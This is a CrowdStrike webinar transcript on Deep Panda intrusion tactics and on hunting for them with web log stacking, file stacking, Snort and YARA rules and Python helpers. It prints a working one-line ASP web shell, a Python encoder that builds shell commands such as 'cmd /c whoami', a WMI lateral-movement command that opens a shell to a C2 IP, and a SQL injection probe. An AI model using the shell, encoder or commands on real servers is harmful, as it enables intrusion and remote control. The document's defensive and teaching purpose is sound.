CrowdCasts Monthly: Going Beyond the Indicator
DESCRIPTION
Learn more about CrowdStrike Services. Request a free consultation on Proactive Response and Incident Response offerings: response.crowdstrike.com/services/
TRANSCRIPT
Going Beyond the Indicator
Agenda
• Introductions
• Typical Attacker TTPs
• Case Studies
• New Tactics Explained
• Hunting and Detecting
• Best Practice Preparations
• Resources / Q & A
© 2014 CrowdStrike, Inc. All rights reserved.
@CROWDSTRIKE | #CROWDCASTS
Today's Speakers

DANNY LUNGSTROM
Prior to CrowdStrike: Stroz Friedberg, AT&T, The Aerospace Corporation, CERT/CC
8+ years: Incident Response, Forensic Analysis, and Risk Assessments
Connect: LinkedIn: Danny Lungstrom
JUSTIN J. WEISSERT
Prior to CrowdStrike: KPMG LLP (Information Protection and Business Resiliency)
7+ years: Performing Security Assessments, Auditing and Remediating Environments, and Developing Security Programs/Strategies
Connect: LinkedIn: Justin Weissert | Twitter: @JJWeissert
RYAN JAFARKHANI
Prior to CrowdStrike: RSA NetWitness, Mandiant, Beckman Coulter
5+ years: Auditing, Conducting Incident Response Investigations, Network Forensics, Computer Forensics and Malware Analysis
Connect: LinkedIn: Ryan Jafarkhani | Twitter: @rj_jafar
WHO IS CROWDSTRIKE?
CrowdStrike is a global provider of security technologies and services focused on identifying advanced threats and targeted attacks. Using big-data technologies, CrowdStrike's next-generation threat protection platform enables enterprises to identify unknown malware, detect zero-day threats, pinpoint advanced adversaries, and provide attribution.
WHAT DO WE DO?
• TECHNOLOGY: Endpoint threat detection & response; continuous endpoint activity monitoring & real-time forensics
• SERVICES: Proactive & incident response services
• INTELLIGENCE: Cyber threat intelligence & attribution
About CrowdStrike Services
• COMPREHENSIVE OFFERINGS: Incident Response Investigations, Proactive Threat Assessments, IR Program Development
• INDUSTRY VETERANS: Average of ten years IR industry experience; backgrounds in IR consulting, government, and defense; specialists in a broad range of technologies
• VARIETY OF CUSTOMER VERTICALS: Finance, Technology, Manufacturing, Retail, Healthcare, Telecommunications, Oil & Gas, Entertainment
WHO: Adversary / WHY: Intent / WHAT: Malware, Industry
And there are a lot of adversaries.
Adversary groups our Intelligence team tracks…
[Figure: adversary groups by origin and the sectors they target. Origins shown: China, Iran, India, Russia, and crime syndicates. Target sectors shown: commercial, government and non-profit; financial, technology and communications; defense & aerospace, industrial engineering and NGOs; financial sector; dissident groups; electronics & communications; G20, NGOs and dissident groups; energy companies; government, legal, financial, media and telecom; oil and gas companies.]
TYPICAL ATTACKER TTPS
Typical - Attacker TTPs
• Initial Attack Vector
• Malware
– Persistence Mechanism
– Command & Control
– Functionality
• Lateral Movement
• Data Extraction/Theft
Shift in Attacker TTPs

Attacker TTP                    | Historical Trend                                                     | Current Trend
Initial Attack Vector           | Spearphish and vulnerable external-facing applications (most common) | No significant change
Malware – Persistence Mechanism | Installed as a service, Run key, etc.                                | No persistence
Malware – Command & Control     | Beacon to malicious IP or domain                                     | No standard beacon activity
Malware – Functionality         | Simple: provides a shell or basic upload/download                    | Robust: includes all required functionality and commands
Malware – Location              | Written to disk                                                      | Memory-resident
Lateral Movement                | net use, RDP, or utilities (e.g. PsExec)                             | WMI, service accounts
Obfuscation                     | Timestomp the standard times only (Windows API, i.e. $STANDARD_INFORMATION) | Timestomp both the standard and the file-name times (Windows API plus direct MFT edits, so $STANDARD_INFORMATION and $FILE_NAME agree)
Data Extraction                 | Compress data and send to compromised host provider                  | No significant change
Last Hop Communication          | Source-country IPs (most often Chinese, Russian, Iranian)            | North American IPs, anonymous VPN solutions, cloud
Catalyst for Change
• Shifts in tactics
  – Increased intel sharing: whitepapers, blog posts, conference demos, VirusTotal, US Government JIB (Joint Indicator Bulletin)

Pros:
• Increased awareness / detection for public companies
• Decreased intel gap for smaller organizations
• Increased cost for attackers to change TTPs

Cons:
• Indicators become less effective as attackers shift TTPs (e.g. new malware, C2 infrastructure)
• Attacks become more advanced to avoid current methods of detection
• Reduced visibility into what the attacker is doing and/or targeting
CASE STUDIES
Case Studies - Background
• Company #1
– Company compromised in 2012 using historical TTPs
– Partial Remediation February 2013
– Re-Compromise March 2013 with new TTPs
• Company #2
– Compromised March 2013
– New TTPs from Company 1 re-compromise were observed
Timeline
[Timeline figure, February–April 2013]
• February 2013: Company #1 investigation commences (traditional tactics); the intel community shares and the TTPs are shared widely; Company #1 partial remediation; logging & monitoring put in place for the old tactics
• March 2013: Company #1 re-compromised (new tactics)
• March–April 2013: Company #2 investigation commences (new tactics)
NEW TACTICS EXPLAINED
Deep Panda – Simple Web Shell
• 28-byte web shell, an Active Server Page (ASP) file:
<%execute request(chr(42))%>
• chr(42) is "*", so the shell reads the request parameter named "*"; the expected value is VBScript, sent percent-encoded (ASCII hex) and decoded by ASP before use
• The execute() function runs whatever VBScript is passed to it:
  – Upload / download files
  – Execute arbitrary commands (including WMI)
  – Full access to the file system
• Controlled by an attacker "thick client"
Deep Panda – Simple Web Shell (cont.)
As a simple example of an encoded command, the following GET request would cause the backdoor to execute Response.Write("<h1>Hello World</h1>"), rendering "Hello World" in the browser (showimage.asp stands in for whatever file name the shell was saved under):
http://<webserver>/showimage.asp?*=%52%65%73%70%6F%6E%73%65%2E%57%72%69%74%65%28%22%3C%68%31%3E%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31%3E%22%29
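The round trip the slide describes, as an added example (not the attacker's thick client and not CrowdStrike code): the encoder reproduces the all-hex request above, and the decoder recovers the VBScript from a URL or from the raw cs-uri-query an IIS log records, returning None for requests that carry no "*" parameter so it can be run over a whole log. The host name and the second command are assumed for illustration.

```python
"""Encode and decode commands for the 28-byte ASP shell <%execute request(chr(42))%>.

Added example, not the attacker's thick client or any CrowdStrike tool.
chr(42) is "*", so the shell reads the request parameter named "*" and hands
its value to execute(). The value travels percent-encoded and ASP decodes it
before the VBScript runs, which is why the slide's request looks like ASCII hex.
"""
from typing import Optional
from urllib.parse import parse_qs, urlsplit

SHELL_PARAM = "*"  # request(chr(42))

# Assumed location of the shell; the slide only shows <webserver>/showimage.asp.
SHELL_URL = "http://webserver.example/showimage.asp"
HELLO_WORLD = 'Response.Write("<h1>Hello World</h1>")'


def encode_command(vbscript: str) -> str:
    """Percent-encode every byte, the all-hex style of the slide's example request."""
    return "".join("%%%02X" % b for b in vbscript.encode("utf-8"))


def build_shell_url(shell_url: str, vbscript: str) -> str:
    """The GET request an operator would send to a shell saved at shell_url."""
    return f"{shell_url}?{SHELL_PARAM}={encode_command(vbscript)}"


def decode_shell_request(url_or_query: str) -> Optional[str]:
    """Recover the VBScript from a full URL or from a bare cs-uri-query as IIS logs it.

    Returns None when the request has no "*" parameter, so only shell traffic
    comes back when this is applied to every request in a log.
    """
    query = urlsplit(url_or_query).query if "?" in url_or_query else url_or_query
    values = parse_qs(query, keep_blank_values=True).get(SHELL_PARAM)
    return values[0] if values else None


if __name__ == "__main__":
    request = build_shell_url(SHELL_URL, HELLO_WORLD)
    print(request)
    print(decode_shell_request(request))
    # Assumed second command, showing the "execute arbitrary commands" case.
    print(decode_shell_request(build_shell_url(SHELL_URL, 'Set s=CreateObject("WScript.Shell"):s.Run "cmd /c whoami",0')))
```

When hunting, feed cs-uri-query from the IIS logs straight into decode_shell_request: IIS stores the query string still encoded, and parse_qs undoes that, so the VBScript the adversary ran is readable without touching the web server.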
Deep Panda – Complex Web Shell
• Ability to impersonate a user (with valid credentials)
• Eight different commands
– File system, SQL server, and Active Directory requests
– Upload / download files
– Compile and execute any C# code
Web Shell Authentication
• Rudimentary (but effective) authentication for incoming connections; a request is handled by the shell only if it carries one of:
  – a cookie named 'zWiz'
  – the HTTP header Keep-Alive: 320
  – a language header (e.g. Accept-Language) containing es-DN, which is not a valid language tag
• Prevents identification via search engine indexing or vulnerability scanning, since crawlers and scanners send none of these markers
Web Shells – But Why?
• Primary foothold back into the victim organization
• Less reliant on malware installed on systems and beaconing to a C2
• Why?
  – Low to virtually no detection by antivirus products
  – No command and control beacon traffic to spot
  – Blocking known malicious IP addresses at the web server is ineffective, since the adversary can change source IP at will
  – Cookie- and HTTP-header-aware web shells avoid enumeration by search engines and restrict who can reach them, further reducing their network footprint
Second Stage Malware
[Diagram: Adversary → anonymous VPN or proxy → web shell on the web server. Steps: access the web shell; upload malware; execute it using the web shell; lateral movement; data theft. The implant communicates with separate C2 infrastructure.]
Why? No command and control beacon activity; change IP/domain on the fly; runs in memory; limits forensic artifacts
Lateral Movement
[Diagram: Adversary → anonymous VPN or proxy → web shell on the web server → Host 2 (via WMI) → C2 infrastructure at 59.111.22.222]
Command run on the web server through the web shell:
System32\cmd.exe - c:\bad.exe /f wmi /s Host2 /u Host2\Administrator /p "P@ssW0rd" /m call /q "Win32_Process" /c Create – CommandLine:C:\bad.exe /f sh /s 59.111.22.222 /p 443
bad.exe in wmi mode calls Win32_Process Create on Host2 as Host2\Administrator; the process it creates runs bad.exe in sh mode, which connects out to the C2 at 59.111.22.222 on port 443.
• Leverage WMI: custom VB script "PsExec" utility
  – 4 KB script to remotely launch a process as a specified user
  – Run with cscript.exe; arguments: username, password, remote host, process path
• Why WMI?
  – Evades most typical logging; activity shows up as the WMI service
  – Powerful functionality, built into Windows
HUNTING AND DETECTING
Go Beyond the Indicator
• New evil requires new approaches for detection
• Look through multiple haystacks for a single needle
– The evil stands out with the right methodology
• Blog series
– Mo’ Shells Mo’ Problems
http://www.crowdstrike.com/blog/
Hunting – WMI Activity
• Windows XP and Server 2003 had limited logging
  – %systemroot%\system32\wbem\logs
• Windows 7 and Server 2008 do NOT log WMI activity by default
  – Help investigators help you: enable it ahead of time
  – wevtutil.exe sl Microsoft-Windows-WMI-Activity/Trace /e:true
  – Review WMITracing.log via Event Viewer (the Trace channel is an analytic log, so Event Viewer must have "Show Analytic and Debug Logs" enabled before it is displayed)
• Be familiar with your environment's use of WMI
Hunting Web Shells – Identifying Intrusion Points
• Web shells are often one of the earliest stages of malware on a compromised host
• Search for activity on the system near the first known compromise time:
  – Successful web scans in the logs
  – SQL injection
  – Dropper malware
  – Lateral movement from other compromised systems
  – Pages created or modified within the web server document root
Example IIS log entry showing SQL injection (the query decodes to id=1' or 1=@@version--, a probe for the SQL Server version string):
2013-08-25 13:03:53 GET item-details.aspx id=1%27%20or%201=@@version-- - 80 - <redacted IP>
Hunting Web Shells – File Stacking
• File stacking is based on the concept of least frequency of occurrence: what is common across the fleet is probably legitimate; what exists on only one host deserves a look
• Collect script files (PHP, JSP, ASP, ASPX, CFM) from all of your web servers and investigate the outliers
  – Which files do not exist on the other web servers?
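File stacking as working code, added here as an example (not a CrowdStrike tool): the inventory is constructed, mapping each server to the files under its document root with a shortened content hash, as a DirList-style collection might produce. Two stacks are run: by path, to find a script present on fewer than min_servers hosts, and by content, to find a page that exists everywhere but differs on one host, which is how an appended shell in a legitimate page shows up.

```python
"""File stacking across web servers: least frequency of occurrence.

Added example, not from the CrowdCast. INVENTORY is constructed for
illustration; in practice it comes from a fleet-wide file listing with hashes.
"""
from collections import defaultdict
from pathlib import PurePosixPath
from typing import Dict, List

SCRIPT_EXTENSIONS = {".php", ".jsp", ".asp", ".aspx", ".cfm"}

# Constructed inventory: server -> {document-root-relative path: content hash (shortened)}
INVENTORY: Dict[str, Dict[str, str]] = {
    "web01": {"/default.aspx": "a1", "/item-details.aspx": "b2", "/images/logo.png": "c3", "/include/db.aspx": "d4"},
    "web02": {"/default.aspx": "a1", "/item-details.aspx": "b2", "/images/logo.png": "c3", "/include/db.aspx": "d4"},
    "web03": {"/default.aspx": "a1", "/item-details.aspx": "b2", "/images/logo.png": "c3", "/include/db.aspx": "d4",
              "/images/showimage.asp": "ff"},
    "web04": {"/default.aspx": "a1", "/item-details.aspx": "b2", "/images/logo.png": "c3", "/include/db.aspx": "e5"},
}


def is_script(path: str) -> bool:
    """Only server-side script types can carry a web shell."""
    return PurePosixPath(path).suffix.lower() in SCRIPT_EXTENSIONS


def stack_by_path(inventory: Dict[str, Dict[str, str]], min_servers: int = 2) -> Dict[str, List[str]]:
    """Script paths present on fewer than min_servers hosts -> the hosts that have them."""
    seen: Dict[str, List[str]] = defaultdict(list)
    for server, files in inventory.items():
        for path in files:
            if is_script(path):
                seen[path].append(server)
    return {p: sorted(s) for p, s in seen.items() if len(s) < min_servers}


def stack_by_content(inventory: Dict[str, Dict[str, str]]) -> Dict[str, Dict[str, List[str]]]:
    """Script paths whose content hash is not the same on every host -> {hash: hosts}."""
    hashes: Dict[str, Dict[str, List[str]]] = defaultdict(lambda: defaultdict(list))
    for server, files in inventory.items():
        for path, digest in files.items():
            if is_script(path):
                hashes[path][digest].append(server)
    return {p: {h: sorted(s) for h, s in hs.items()} for p, hs in hashes.items() if len(hs) > 1}


def report(inventory: Dict[str, Dict[str, str]], min_servers: int = 2) -> List[str]:
    """Human-readable outlier list; the minority hash is the one to pull and inspect."""
    lines = []
    for path, servers in sorted(stack_by_path(inventory, min_servers).items()):
        lines.append(f"RARE  {path} only on {', '.join(servers)}")
    for path, variants in sorted(stack_by_content(inventory).items()):
        odd_hash, odd_servers = min(variants.items(), key=lambda kv: len(kv[1]))
        lines.append(f"DIFF  {path} content differs on {', '.join(odd_servers)}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(INVENTORY)))
```

Both stacks are needed: a dropped shell is a new path (RARE), while a shell injected into an existing page keeps the expected path and only the content stack catches it (DIFF). Raise min_servers for load-balanced pools where a file legitimately sits on a single host, and stack by hash rather than by name when the adversary copies an existing file name.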
Hunting Web Shells – Web Log Review
• Perform statistical analysis of page requests and search for outliers: pages requested rarely, by few client IPs, or with unusual parameters
  – The web logs show exactly when the web shells were in use
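The review described above, run over constructed IIS W3C log lines (added example; the lines are made up for illustration and not from any investigation). Requests are stacked by URI stem with hit count, distinct client IPs, methods, and first/last seen; the thresholds in outliers() are assumptions to tune per site. activity_for_ip() then pivots from the SQL injection probe to everything that client did, which is how the shell's window of use falls out of the logs.

```python
"""Statistical review of IIS W3C logs to surface web shell use.

Added example; LOG is constructed for illustration. Field names follow the
#Fields directive, so the parser works on real IIS logs with other layouts.
"""
from datetime import datetime
from typing import Dict, Iterator, List, Tuple

LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2013-08-25 13:01:10 GET /default.aspx - 80 - 203.0.113.7 200
2013-08-25 13:01:12 GET /item-details.aspx id=1 80 - 203.0.113.7 200
2013-08-25 13:03:53 GET /item-details.aspx id=1%27%20or%201=@@version-- 80 - 198.51.100.9 500
2013-08-25 13:05:01 GET /default.aspx - 80 - 192.0.2.44 200
2013-08-25 13:09:40 POST /images/showimage.asp - 80 - 198.51.100.9 200
2013-08-25 13:09:58 GET /images/showimage.asp *=%52%65%73%70%6F%6E%73%65 80 - 198.51.100.9 200
2013-08-25 13:10:30 GET /item-details.aspx id=7 80 - 192.0.2.44 200
2013-08-25 14:22:05 GET /default.aspx - 80 - 203.0.113.20 200
2013-08-25 14:22:09 GET /item-details.aspx id=3 80 - 203.0.113.20 200
2013-08-26 02:14:07 POST /images/showimage.asp - 80 - 198.51.100.9 200
"""


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per request, keyed by the names in the most recent #Fields line."""
    fields: List[str] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))


def stack_uris(text: str) -> Dict[str, dict]:
    """Per URI stem: hit count, distinct client IPs, methods, first and last request time."""
    stats: Dict[str, dict] = {}
    for rec in parse_w3c(text):
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        s = stats.setdefault(rec["cs-uri-stem"],
                             {"hits": 0, "ips": set(), "methods": set(), "first": ts, "last": ts})
        s["hits"] += 1
        s["ips"].add(rec["c-ip"])
        s["methods"].add(rec["cs-method"])
        s["first"] = min(s["first"], ts)
        s["last"] = max(s["last"], ts)
    return stats


def outliers(stats: Dict[str, dict], max_ips: int = 2, max_share: float = 0.3) -> List[str]:
    """URIs reached by few distinct clients that carry a small share of all requests (assumed thresholds)."""
    total = sum(s["hits"] for s in stats.values())
    return sorted(uri for uri, s in stats.items()
                  if len(s["ips"]) <= max_ips and s["hits"] / total <= max_share)


def activity_for_ip(text: str, ip: str) -> List[Tuple[str, str, str, str]]:
    """Everything one client did, in log order: pivot from the intrusion point to the shell."""
    return [(f"{r['date']} {r['time']}", r["cs-method"], r["cs-uri-stem"], r["cs-uri-query"])
            for r in parse_w3c(text) if r["c-ip"] == ip]


if __name__ == "__main__":
    stats = stack_uris(LOG)
    for uri in outliers(stats):
        s = stats[uri]
        print(f"{uri}: {s['hits']} hits from {sorted(s['ips'])}, {sorted(s['methods'])}, "
              f"{s['first']} .. {s['last']}")
        for ip in sorted(s["ips"]):
            for row in activity_for_ip(LOG, ip):
                print("   ", *row)
```

The output for the constructed log is the single page /images/showimage.asp, used by one client over two days, and that client's history starts with the SQL injection probe on item-details.aspx; with real logs, stack over weeks of data so that a legitimately quiet admin page does not dominate the outlier list.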
Hunting Web Shells – Network Monitoring
• Stack web requests from network data
• Leverage cyber intelligence feeds to detect known web shells
  – Unique header attributes
  – HTML used to produce the shell
Example Snort rule for the complex web shell's header markers (sid and rev are left for the deployer to assign):
alert tcp $EXTERNAL_NET any -> $WEB_SERVERS $HTTP_PORTS (msg: "CrowdStrike Deep Panda CSharp Webshell Headers"; content: "Keep-Alive: 320"; http_raw_header; content: "es-DN"; http_raw_header; flow: established, to_server; classtype: trojan-activity; metadata: service http; sid: xxx; rev: xxx; )
Note that the rule fires only when both Keep-Alive: 320 and es-DN appear in the same request; the shell itself accepts any one of its three markers, so a session that authenticates with the zWiz cookie alone would not match this signature.
Hunting – Memory Resident Malware
• “Fileless” Forensics Fun
• Persistence, We Don’t Need No Stinkin’ Persistence
• New Approach to Malware Means New Approach to Forensics
• Hidden, Not Invisible
• What’s Normal and What’s New?
– Get to know your systems
– Image memory, review, rinse and repeat
Hunting with YARA
• YARA signatures can be used to search your enterprise for specific patterns on disk and in memory

rule CrowdStrike_13091_01 : deep_panda alice RAT
{
    meta:
        description = "Detection of Mad Hatter .NET RAT"
        last_modified = "2013-10-08"
        version = "1.1"
        in_the_wild = true
        copyright = "CrowdStrike, Inc"
        report = "CSIT-13091"
    strings:
        $marker1 = "alice'srabbithole" wide
        $marker2 = "{{\"Version\":{0},\"HostName\":\"{1}\",\"osVersion\":\"{2}\",\"tm\":\"{3}\",\"tz\":{4}}}" wide
        $marker3 = "InstManager.pdb"
        $marker4 = "<osVersion>"
        $marker5 = "<tm>"
        $marker6 = "<tz>"
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 2 of ($marker*)
}
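What the rule's condition actually tests, re-implemented in plain Python as an added example (this is not YARA and not CrowdStrike code; in production run the rule itself with yara or CrowdResponse). It makes two things explicit that the one-line rule hides: the wide modifier means the string is matched as UTF-16LE, so an ASCII copy of "alice'srabbithole" does not count, and uint32(uint32(0x3C)) follows e_lfanew in the DOS header to the PE signature. The sample bytes are constructed by fake_pe().

```python
"""The CrowdStrike_13091_01 condition, spelled out in Python.

Added example for illustration only: it evaluates the rule's logic over a byte
buffer so the 'wide' modifier and the PE header checks are visible. Use YARA
itself for real hunting.
"""
import struct
from typing import List

ASCII_MARKERS = [b"InstManager.pdb", b"<osVersion>", b"<tm>", b"<tz>"]
# YARA's \" escapes become plain quotes; the doubled braces are literal bytes.
WIDE_MARKERS = [
    "alice'srabbithole",
    '{{"Version":{0},"HostName":"{1}","osVersion":"{2}","tm":"{3}","tz":{4}}}',
]


def wide(s: str) -> bytes:
    """YARA 'wide': each character followed by a NUL byte, i.e. UTF-16LE."""
    return s.encode("utf-16-le")


def is_pe(data: bytes) -> bool:
    """uint16(0) == 0x5A4D ('MZ') and uint32(uint32(0x3C)) == 0x00004550 ('PE\\0\\0')."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]  # offset of the PE signature
    return len(data) >= e_lfanew + 4 and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def matched_markers(data: bytes) -> List[str]:
    """Names of the rule's strings found in data, ASCII ones first, then wide ones."""
    hits = [m.decode() for m in ASCII_MARKERS if m in data]
    hits += [s for s in WIDE_MARKERS if wide(s) in data]
    return hits


def rule_matches(data: bytes, minimum: int = 2) -> bool:
    """PE header checks and '2 of ($marker*)'."""
    return is_pe(data) and len(matched_markers(data)) >= minimum


def fake_pe(payload: bytes) -> bytes:
    """Constructed sample: MZ stub with e_lfanew = 0x40 pointing at 'PE\\0\\0', then payload."""
    header = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", header, 0x3C, 0x40)
    return bytes(header) + b"PE\x00\x00" + payload


if __name__ == "__main__":
    sample = fake_pe(wide("alice'srabbithole") + b"\x00InstManager.pdb\x00")
    print(matched_markers(sample), rule_matches(sample))
```

The minimum of two markers is what keeps the rule from firing on any .NET binary that merely contains "<tm>" or "<tz>" in its XML serialization, while the PE check rules out memory dumps and text files that happen to carry the strings; when adapting a rule for memory scanning, drop the header condition, since an unpacked image in memory may not start with the MZ stub.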
CrowdResponse
• Free CrowdStrike Community Tool
• Collect and Analyze Artifacts Across Your Enterprise
• Available Modules
– DirList
– YARA
– PSList
• Many Modules Coming Soon
http://www.crowdstrike.com/community-tools/
BEST PRACTICE PREPARATIONS
Best Practices
• Proactive Defense of Your Network
– Isolate Critical Assets with Network Segmentation
– Consolidate and Monitor Internet Egress Points
– Implement Centralized Logging
– Patch, Patch, and Patch Again
– Secure Web Applications and Internal Software Projects
– Minimize or Remove Local Admin Privileges
– Implement a Tiered Active Directory Admin Model
– Incorporate Cyber Intelligence Feeds
CrowdStrike Can Help!
• Services to Consider
– Tabletop Assessments (Yearly at Least)
• Keep your team primed and educated on latest attack vectors
– Next-Gen Penetration Testing
• More than just a cursory glance, take a real-world scenario approach
– Incident Response, Disaster Recovery and Business Continuity Plans
• CrowdStrike knowledge and experience can help you improve/build plans
– Incident Response Services Retainer
• Avoid paperwork related time delays
• CrowdStrike Intelligence Subscription
– Stay Up To Date with Latest Attacker TTPs
CROWDSTRIKE RESOURCES
CrowdStrike Global Threat Report
• Adversary activity analysis and predictions
• Look back at 2013
• Predictive trends for 2014
• Threat actor profiles and TTPs
• Get it on crowdstrike.com
CROWDSTRIKE SERVICES
• Proactive Response Services: Counter Threat Assessment, IR Program Development, Next-Gen Pen Testing, Tabletop Assessment, InfoSec Capability Maturity Model, Adversary Assessments
• Incident Response Services: Computer Forensic Analysis, Litigation Support, Expert Witness Testimony, Remediation, Malware Analysis
• Also: Intelligence, Technology

Falcon Intelligence: Threat Intelligence Subscription
1. Government-quality intelligence developed using an 'all-source model'
2. Detailed technical and strategic analysis of 50+ adversaries' capabilities, indicators and tradecraft, attribution and intentions
3. Customizable feeds and API for indicators of compromise
4. Indicators can be integrated into current firewall, IDS/IPS, or SIEM solutions to provide real-time attribution
5. Tailored Intelligence feature provides visibility into breaking events that matter to an organization's brand, infrastructure, and customers

Falcon Host: Endpoint Threat Detection & Response
1. Identifies unknown malware & detects zero-day threats
2. Captures and correlates system events to identify adversary activity in real time
3. Maximum visibility across the full kill chain allows insight into past & current attacks
4. Context-based detection does not rely on signatures or easily changed IOCs
5. Intelligence integration provides full attribution to identify the context, motivation, and actor behind an attack

Falcon Host: Continuous Endpoint Activity Monitoring
1. Explore rich execution data collected by the Falcon Host sensors
2. Dashboards provide an at-a-glance view of recent activity for investigative purposes
3. Expert-designed menu of queries provides the ability to proactively hunt for malicious activity
Q & A

NEXT
Topic: Operationalizing Intelligence
Adam Meyers – Director, Intelligence
Elia Zaitsev – Senior Sales Engineer
April 29th | 2PM ET / 11AM PT